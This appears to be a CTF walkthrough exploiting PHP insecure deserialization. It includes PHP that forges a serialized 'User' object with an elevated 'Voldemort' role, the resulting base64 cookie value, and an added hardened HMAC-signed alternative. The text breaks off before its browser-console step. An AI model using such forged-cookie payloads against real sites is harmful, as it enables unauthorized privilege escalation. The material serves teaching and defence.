As we can see, it looks like a normal page with nothing strange in it, so let's check the source code.
I found that there is a link to "source.php", so let's check it.
As we can see, it contains PHP code mixed with some HTML. Let's see what we can do with it.
There is a class called User that has a private variable called "role" with the value "Guest", and a "GetInfo" method that checks whether you have the "Voldemort" role and returns a different title depending on the result.
Then there is another piece of PHP code that checks whether the request carries a "user" cookie: if it exists, the value is base64-decoded and then unserialized, and if the "user" cookie does not exist, a User with the default role (Guest) is created.
Now we can take the User class, change the role to "Voldemort", serialize the object and then base64-encode it. Let's do that with the following code:
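To see why this cookie handling is the problem, here is the pattern just described next to a hardened version. This is an added example, not the challenge's own code; the class layout, function names and the secret are assumptions.

```php
<?php
// Added example, not the challenge's code: the cookie handling the page describes
// (vulnerable) beside a hardened version. Names and the secret are assumed.
class User
{
    private $role = "Guest";
    public function getRole(): string { return $this->role; }
}

// Vulnerable: the client supplies the serialized object, so it chooses every
// property value and every class that unserialize() will instantiate.
function loadUserVulnerable(array $cookies): User
{
    return isset($cookies['user'])
        ? unserialize(base64_decode($cookies['user']))
        : new User();
}

// Hardened: never unserialize client data. Carry plain JSON and an HMAC over it;
// an edited or forged cookie fails hash_equals() and the user stays Guest.
function issueCookie(string $role, string $secret): string
{
    $payload = base64_encode(json_encode(['role' => $role]));
    return $payload . '.' . hash_hmac('sha256', $payload, $secret);
}

function loadRoleHardened(array $cookies, string $secret): string
{
    if (!isset($cookies['user']) || substr_count($cookies['user'], '.') !== 1) {
        return 'Guest';
    }
    [$payload, $tag] = explode('.', $cookies['user']);
    if (!hash_equals(hash_hmac('sha256', $payload, $secret), $tag)) {
        return 'Guest';                        // tag mismatch: tampered or forged
    }
    $data = json_decode(base64_decode($payload, true), true);
    return (is_array($data) && is_string($data['role'] ?? null)) ? $data['role'] : 'Guest';
}

// Constructed demo: the edited cookie from this writeup is accepted by the first
// loader and rejected by the second; only a server-issued cookie is honoured.
$secret = 'server-side-secret-placeholder';
$forged = ['user' => 'Tzo0OiJVc2VyIjoxOntzOjEwOiIAVXNlcgByb2xlIjtzOjk6IlZvbGRlbW9ydCI7fQ=='];
echo loadUserVulnerable($forged)->getRole(), PHP_EOL;
echo loadRoleHardened($forged, $secret), PHP_EOL;
echo loadRoleHardened(['user' => issueCookie('Guest', $secret)], $secret), PHP_EOL;
```

Passing `['allowed_classes' => false]` to unserialize() stops the client from instantiating arbitrary classes but still lets it edit the role, so signing the cookie or keeping the role server-side is the actual fix.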
<?php
// Same User class as in source.php, but with the role already set to "Voldemort"
class User
{
    private $role = "Voldemort";

    public function GetInfo()
    {
        include("titles.php");
        if ($this->role === "Voldemort")
        {
            return $Title_A;
        }
        else
        {
            return $Title_B;
        }
    }
}

// Serialize the modified object and base64-encode it, exactly as the cookie expects
$user = new User();
$solution = base64_encode(serialize($user));
echo $solution;
There are two ways to exploit it:
You can add a new cookie named "user" and assign "Tzo0OiJVc2VyIjoxOntzOjEwOiIAVXNlcgByb2xlIjtzOjk6IlZvbGRlbW9ydCI7fQ==" as its value.
Or you can simply execute the following code in the browser console